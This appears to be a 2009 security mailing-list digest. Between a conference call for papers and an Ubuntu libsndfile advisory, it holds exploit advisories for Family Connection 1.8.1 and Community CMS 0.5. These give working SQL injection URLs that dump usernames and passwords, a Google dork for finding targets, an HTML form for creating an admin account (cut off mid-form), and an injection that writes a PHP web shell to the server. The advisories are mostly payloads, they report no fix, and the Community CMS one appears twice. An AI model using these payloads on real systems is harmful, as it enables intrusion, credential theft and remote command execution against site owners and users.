email=-1' UNION ALL SELECT '?php echo pre; system($_GET[cmd]); echo /prebrbr;?',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE '/var/www/htdocs/path/rce.php'# To execute commands: http://www.site.com/path/rce.php?cmd=ls * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Family Connection [+] Version: 1.8.1 [+] Website: http://www.familycms.com [+] Bugs: [A] Multiple SQL Injection [B] Create Admin User [C] Blind SQL Injection [+] Exploitation: Remote [+] Date: 25 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] Multiple SQL Injection [-] Requisites: magic_quotes_gpc = on/off These bugs allows a registered user to view username and password of all registered users. - [B] Create Admin User [-] Requisites: magic_quotes_gpc = off [-] File affected: register.php, activate.php This bug allow a guest to create an account with administrator privileges. - [C] Blind SQL Injection [-] Requisites: magic_quotes_gpc = off [-] File affected: lostpw.php * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/addressbook.php?letter=-1%25' UNION ALL SELECT 1,2,NULL,username,5,password,email FROM fcms_users%23 http://www.site.com/path/recipes.php?category=1id=1 UNION SELECT 1,2,username,password,5,6 FROM fcms_users http://www.site.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23 - [B] Create Admin User html head titleFamily Connection 1.8.1 Create Admin User Exploit/title /head body pThis exploit creates an user with administrator privileges using follows information:br Username: rootbr Password: toorbr form action=http://localhost/fcms/register.php; method=POST input type=hidden name=username value=blabla input type=hidden name=password value=blabla input type=hidden name=email value=bla...@blabla.blabla input type=hidden name=fname value=blabla
DeepSec 2009 - Call for Papers is open
=== DeepSec In-Depth Security Conference 2009 - The Third Call for Papers and Experts The DeepSec organisation is happy to announce the Call for Papers for the next conference in November 2009. The conference will take place at the Imperial Riding School Renaissance Hotel in Vienna, Austria. == Topics == The focus of DeepSec will be on subtle dangers, stealthy exploits and things you don't see. If you got something to talk about that doesn't look like a security problem at the first glance, tell us about it. We'd like to hear about underestimated security issues that may be turned into major headaches for computer systems, networks and users alike. Send us stories about single bits that can change our destiny. Failing that we welcome less sneaky approaches, too. - AJAX/Web2.0/JavaScript Security - Cloud Computing - Code Analysis - Cryptographical Weaknesses - Digital Espionage - Digital Forensics - eVoting - Failure anf Fixes of all kinds - Incident Response - Malware Research - Messaging Technologies - Network Protocols - Operating Systems - Secure Software Development - Security Management - Social Engineering - Virtualisation Please note, that we are a non-product, non-vendor biased security conference and do not welcome vendor pitches in the conference talks or trainings. We will provide an opportunity for vendor self presentation through sponsorship and vendor booths in the conference lounge, where coffee and snacks will be served during the breaks. == Hacker Lounge == If you don't wish to present a talk or conduct a workshop, you can still try to participate. We are looking for hackers who want to show us their gadgets and methods to break (or fix) networks and security systems. You got something that has lots of blinkenlights, stealth or ideas that go well with security topics, we want to hear about it. Submit it on the CfP web page and get a place in the foyer to show off. == Submission == Proposals for talks and trainings at the second annual DeepSec In-Depth Security Conference will be accepted until _July 15th 2009, 23:59 CEST_. All proposals should be submitted through our web site https://deepsec.net/cfp/ or by email to: c...@deepsec.net == About DeepSec == DeepSec IDSC is an annual European two-day in-depth conference on computer, network, and application security. It takes place in November and aims to bring together the world's leading security professionals from academics, government, industry, business, and the underground hacking community. The conference offers two days of security talks and two days of trainings, covering the latest topics in network and IT security. DeepSec offers a neutral ground to exchange ideas and experiences, thus making it a unique event where all participants can get in contact freely. == Speakers/Trainers == Speaker privileges include: - One economy class return-ticket to Vienna. - 3 nights of accomodation in the conference hotel. - Breakfast, lunch, and two coffee breaks - Speaker activities during, before, and after the conference. - Speaker's Dinner. - Speaker After-Party in the Metalab Hackerspace. Instructor privileges include: - 50% of the net profit of the class. - 2 nights of accommodation in the conference hotel during the trainings. - Breakfast, lunch, and two coffee breaks. - Free ticket for the conference. - Speaker activities during, before, and after the conference. - Speaker After-Party in the Metalab Hackerspace. If you have questions, want to send us additional material, or have problems with the web form, feel free to contact us at: c...@deepsec.net Best regards, DeepSec In-Depth Security Conference organisation team. https://deepsec.net/contact/
[USN-749-1] libsndfile vulnerability
=== Ubuntu Security Notice USN-749-1 March 30, 2009 libsndfile vulnerability CVE-2009-0186 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libsndfile1 1.0.12-3ubuntu1.1 Ubuntu 7.10: libsndfile1 1.0.17-4ubuntu0.7.10.1 Ubuntu 8.04 LTS: libsndfile1 1.0.17-4ubuntu0.8.04.1 Ubuntu 8.10: libsndfile1 1.0.17-4ubuntu0.8.10.1 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: It was discovered that libsndfile did not correctly handle description chunks in CAF audio files. If a user or automated system were tricked into opening a specially crafted CAF audio file, an attacker could execute arbitrary code with the privileges of the user invoking the program. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.12-3ubuntu1.1.diff.gz Size/MD5: 5749 89e5a304266bb6a29a47e1b9ebae31a8 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.12-3ubuntu1.1.dsc Size/MD5: 651 2fbd2934afd83f1c3ab6b4258a269881 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.12.orig.tar.gz Size/MD5: 798471 03718b7b225b298f41c19620b8906108 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_amd64.deb Size/MD5: 308302 74265d5248f39ad6d8c97576067c30ca http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_amd64.deb Size/MD5: 179406 0014dc31d5b53d643c2ecbce36b4b5c3 http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_amd64.deb Size/MD5:63950 609ed2d20822109f2d6d0098d7618ddb i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_i386.deb Size/MD5: 300372 2874cf5301cb2e076337bd9e5f2f0302 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_i386.deb Size/MD5: 182560 61b33c31ed3f4838ae43deb2285af54c http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_i386.deb Size/MD5:63840 02c9da91983dd14f3e7112f1a454482d powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_powerpc.deb Size/MD5: 331956 fc4744c453f92382096fe1095637a0a9 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_powerpc.deb Size/MD5: 196006 a7bfb57e3aa4e304607bd362e90d2654 http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_powerpc.deb Size/MD5:69426 8130044b011566cde96f8e1bd9885f26 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.12-3ubuntu1.1_sparc.deb Size/MD5: 323784 a28aa32c141e121b7df3640da3a458c5 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.12-3ubuntu1.1_sparc.deb Size/MD5: 197884 565658beff769c2fdaa3c2da2b43cc68 http://security.ubuntu.com/ubuntu/pool/universe/libs/libsndfile/sndfile-programs_1.0.12-3ubuntu1.1_sparc.deb Size/MD5:64316 084607cd611593dd47a92d1dacc4e564 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.7.10.1.diff.gz Size/MD5:10204 26d89a562b90f5148023bacd3ce51e65 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17-4ubuntu0.7.10.1.dsc Size/MD5: 824 40af011aba04502d6c67851224a60d7b http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile_1.0.17.orig.tar.gz Size/MD5: 819456 2d126c35448503f6dbe33934d9581f6b amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1-dev_1.0.17-4ubuntu0.7.10.1_amd64.deb Size/MD5: 334950 4f76034f136dc4c5fcbb9e70bd4f6c14 http://security.ubuntu.com/ubuntu/pool/main/libs/libsndfile/libsndfile1_1.0.17-4ubuntu0.7.10.1_amd64.deb Size/MD5: 190798 78f8525d14ea7d3029515ed3366b736b
Community CMS 0.5 Multiple SQL Injection Vulnerabilities
*** Salvatore drosophila Fresta *** [+] Application: Community CMS [+] Version: 0.5 [+] Website: http://sourceforge.net/projects/communitycms/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Dork: intext:Powered by Community CMS [+] Date: 30 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] File affected: view.php, calendar.php This bug allows a guest to view username and password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users http://www.site.com/path/index.php?id=2view=eventa=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23 * [+] Fix No fix. * -- Salvatore drosophila Fresta CWNP444351 *** Salvatore drosophila Fresta *** [+] Application: Community CMS [+] Version: 0.5 [+] Website: http://sourceforge.net/projects/communitycms/ [+] Bugs: [A] Multiple SQL Injection [+] Exploitation: Remote [+] Dork: intext:Powered by Community CMS [+] Date: 30 Mar 2009 [+] Discovered by: Salvatore drosophila Fresta [+] Author: Salvatore drosophila Fresta [+] Contact: e-mail: drosophila...@gmail.com * [+] Menu 1) Bugs 2) Code 3) Fix * [+] Bugs - [A] SQL Injection [-] File affected: view.php, calendar.php This bug allows a guest to view username and password of a registered user. * [+] Code - [A] Multiple SQL Injection http://www.site.com/path/view.php?article_id=-1 UNION ALL SELECT 1,2,username,password,5,6,7,8,9 FROM comcms_users http://www.site.com/path/index.php?id=2view=eventa=-1 UNION ALL SELECT 1,2,3,4,5,6,7,CONCAT(username, 0x3a, password),NULL,NULL,NULL,12,13,NULL FROM comcms_users%23 * [+] Fix No fix. *
